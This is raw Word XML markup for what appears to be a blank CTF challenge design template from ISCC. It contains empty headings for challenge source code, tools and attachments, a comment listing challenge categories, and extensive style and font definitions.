        <w:t>：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目源代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="420" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc450547264"/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2：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>解题工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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选手下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId4" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:headerReference r:id="rId5" w:type="even"/>
      <w:pgSz w:w="11907" w:h="16839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mart" w:date="2016-06-20T11:25:00Z" w:initials="S">
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由竞赛组织方填写</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Smart" w:date="2016-06-20T19:01:00Z" w:initials="S">
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为</w:t>
      </w:r>
      <w:r>
        <w:t>Basic、Misc、Pwn、Web、Reverse、Moblie六类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14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ource Han Sans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Source Han Sans SC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Source Han Sans SC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Source Han Sans SC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楷体_GB2312">
    <w:altName w:val="Source Han Sans SC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Garamond">
    <w:altName w:val="NanumMyeongjo"/>
    <w:panose1 w:val="02020404030301010803"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:altName w:val="Bitstream Vera Sans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0" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="楷体">
    <w:altName w:val="Source Han Sans SC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Source Han Sans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rPr>
        <w:rStyle w:val="40"/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10</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="40"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="27"/>
      <w:ind w:right="360"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>第</w:t>
    </w:r>
    <w:r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>
      <w:rPr>
        <w:color w:val="FF0000"/>
      </w:rPr>
      <w:t>XX</w:t>
    </w:r>
    <w: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end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="2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36358139">
    <w:nsid w:val="736A7AFB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="736A7AFB"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="47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269899743">
    <w:nsid w:val="101657DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="101657DF"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="31"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia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isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="1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 w:tentative="1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 w:tentative="1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 w:tentative="1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1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1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313409254">
    <w:nsid w:val="12AE3EE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12AE3EE6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5"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:eastAsia="Arial Unicode MS"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="6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7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9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10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11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25277052">
    <w:nsid w:val="4EFE1F7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EFE1F7C"/>
    <w:lvl w:ilvl="0" w:tentative="1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498893224">
    <w:nsid w:val="59574BA8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59574BA8"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1498893591">
    <w:nsid w:val="59574D17"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59574D17"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1498893527">
    <w:nsid w:val="59574CD7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59574CD7"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1498893721">
    <w:nsid w:val="59574D99"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59574D99"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="313409254"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="269899743"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1936358139"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1325277052"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1498893224"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1498893527"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1498893591"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="14988937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F"/>
    <w:rsid w:val="000074AC"/>
    <w:rsid w:val="000120B5"/>
    <w:rsid w:val="00040AE9"/>
    <w:rsid w:val="000452D7"/>
    <w:rsid w:val="000507D3"/>
    <w:rsid w:val="00073106"/>
    <w:rsid w:val="00096B8E"/>
    <w:rsid w:val="000A6035"/>
    <w:rsid w:val="000A6E25"/>
    <w:rsid w:val="000B2F69"/>
    <w:rsid w:val="001061F5"/>
    <w:rsid w:val="0011157C"/>
    <w:rsid w:val="001A5847"/>
    <w:rsid w:val="001B45B7"/>
    <w:rsid w:val="001B6BE4"/>
    <w:rsid w:val="00210675"/>
    <w:rsid w:val="002259A1"/>
    <w:rsid w:val="00254204"/>
    <w:rsid w:val="00265E01"/>
    <w:rsid w:val="002C456E"/>
    <w:rsid w:val="002F19A8"/>
    <w:rsid w:val="00314BF3"/>
    <w:rsid w:val="00325D89"/>
    <w:rsid w:val="00332845"/>
    <w:rsid w:val="00343297"/>
    <w:rsid w:val="00364DEC"/>
    <w:rsid w:val="00392246"/>
    <w:rsid w:val="00395E2C"/>
    <w:rsid w:val="00401A38"/>
    <w:rsid w:val="0043794C"/>
    <w:rsid w:val="00444E65"/>
    <w:rsid w:val="004B7624"/>
    <w:rsid w:val="004C5DD0"/>
    <w:rsid w:val="005460DB"/>
    <w:rsid w:val="00551332"/>
    <w:rsid w:val="00636145"/>
    <w:rsid w:val="006610E3"/>
    <w:rsid w:val="00662B18"/>
    <w:rsid w:val="00693C9A"/>
    <w:rsid w:val="006E1BA6"/>
    <w:rsid w:val="00770F14"/>
    <w:rsid w:val="007B4069"/>
    <w:rsid w:val="008616BE"/>
    <w:rsid w:val="00863D71"/>
    <w:rsid w:val="00864F76"/>
    <w:rsid w:val="008B29C8"/>
    <w:rsid w:val="008B61C9"/>
    <w:rsid w:val="008D047D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8118A"/>
    <w:rsid w:val="009B219D"/>
    <w:rsid w:val="009F3DE5"/>
    <w:rsid w:val="009F3EB3"/>
    <w:rsid w:val="00A00435"/>
    <w:rsid w:val="00A46A1C"/>
    <w:rsid w:val="00A47FF0"/>
    <w:rsid w:val="00A55FF5"/>
    <w:rsid w:val="00A662DF"/>
    <w:rsid w:val="00A7067E"/>
    <w:rsid w:val="00A84259"/>
    <w:rsid w:val="00AB1C5C"/>
    <w:rsid w:val="00B23E6B"/>
    <w:rsid w:val="00B466A7"/>
    <w:rsid w:val="00B65268"/>
    <w:rsid w:val="00B87FDE"/>
    <w:rsid w:val="00BD1CB3"/>
    <w:rsid w:val="00BE38D3"/>
    <w:rsid w:val="00C23CFE"/>
    <w:rsid w:val="00C64500"/>
    <w:rsid w:val="00C75080"/>
    <w:rsid w:val="00C802A4"/>
    <w:rsid w:val="00C817F5"/>
    <w:rsid w:val="00C8555B"/>
    <w:rsid w:val="00C92905"/>
    <w:rsid w:val="00D34EAF"/>
    <w:rsid w:val="00D71AEE"/>
    <w:rsid w:val="00D776FE"/>
    <w:rsid w:val="00DA2FBF"/>
    <w:rsid w:val="00DB1BF3"/>
    <w:rsid w:val="00DB4BD3"/>
    <w:rsid w:val="00DD1FC3"/>
    <w:rsid w:val="00DF1D39"/>
    <w:rsid w:val="00E64D48"/>
    <w:rsid w:val="00EA5D42"/>
    <w:rsid w:val="00ED5E06"/>
    <w:rsid w:val="00F23EBC"/>
    <w:rsid w:val="00F45616"/>
    <w:rsid w:val="00F655AC"/>
    <w:rsid w:val="00F8431F"/>
    <w:rsid w:val="00F96BFC"/>
    <w:rsid w:val="00FC0B24"/>
    <w:rsid w:val="75F777EE"/>
    <w:rsid w:val="B9FAF542"/>
    <w:rsid w:val="BFCD3A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atLeast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 w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="432"/>
      </w:tabs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tabs>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="240"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="宋体" w:eastAsia="Arial Unicode MS"/>
      <w:b/>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="36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tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="864"/>
      </w:tabs>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
        <w:tab w:val="left" w:pos="1008"/>
      </w:tabs>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="left" w:pos="1152"/>
      </w:tabs>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1296"/>
      </w:tabs>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1584"/>
      </w:tabs>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:spacing w:val="-5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="38">
    <w:name w:val="Default Paragraph Font"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="4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基准标题"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="Body Text"/>
    <w:link w:val="55"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="60" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="510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13">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="14"/>
    <w:next w:val="14"/>
    <w:link w:val="52"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="51"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15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6">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17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18">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19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20">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="21"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot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customStyle="1" w:styleId="21">
    <w:name w:val="基准目录样式"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"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2">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Courier New"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23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4">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="432" w:firstLineChars="180"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="53"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26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27">
    <w:name w:val="header"/>
    <w:basedOn w:val="1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paragraph" w:styleId="28">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="21"/>
    <w:next w:val="1"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styleId="29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30">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="31"/>
    <w:next w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs>
      <w:spacing w:after="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="楷体_GB2312"/>
      <w:b w:val="0"/>
      <w:caps w:val="0"/>
      <w:smallCaps/>
      <w:spacing w:val="20"/>
      <w:sz w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="Title"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs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styleId="32">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33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4">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="840" w:leftChars="200" w:hanging="420" w:hangingChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="35">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="21"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="800"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8297"/>
        <w:tab w:val="clear" w:pos="-18551"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="36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7">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="39">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="40">
    <w:name w:val="page number"/>
    <w:basedOn w:val="38"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="41">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="42">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="43">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="44">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="46">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="4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7">
    <w:name w:val="条目"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="425"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Garamond"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="large1"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="t21"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="脚注文本 Char"/>
    <w:link w:val="32"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="批注文字 Char"/>
    <w:link w:val="14"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="批注主题 Char"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="批注框文本 Char"/>
    <w:link w:val="25"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="54">
    <w:name w:val="List Paragraph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55">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="38"/>
    <w:link w:val="4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ISCC</Company>
  <Pages>11</Pages>
  <Words>766</Words>
  <Characters>4370</Characters>
  <Lines>36</Lines>
  <Paragraphs>10</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5126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2016-03-11T01:04:00Z</dcterms:created>
  <dc:creator>Danny Wei</dc:creator>
  <cp:lastModifiedBy>k</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-01T15:26:44Z</dcterms:modified>
  <dc:title>详细设计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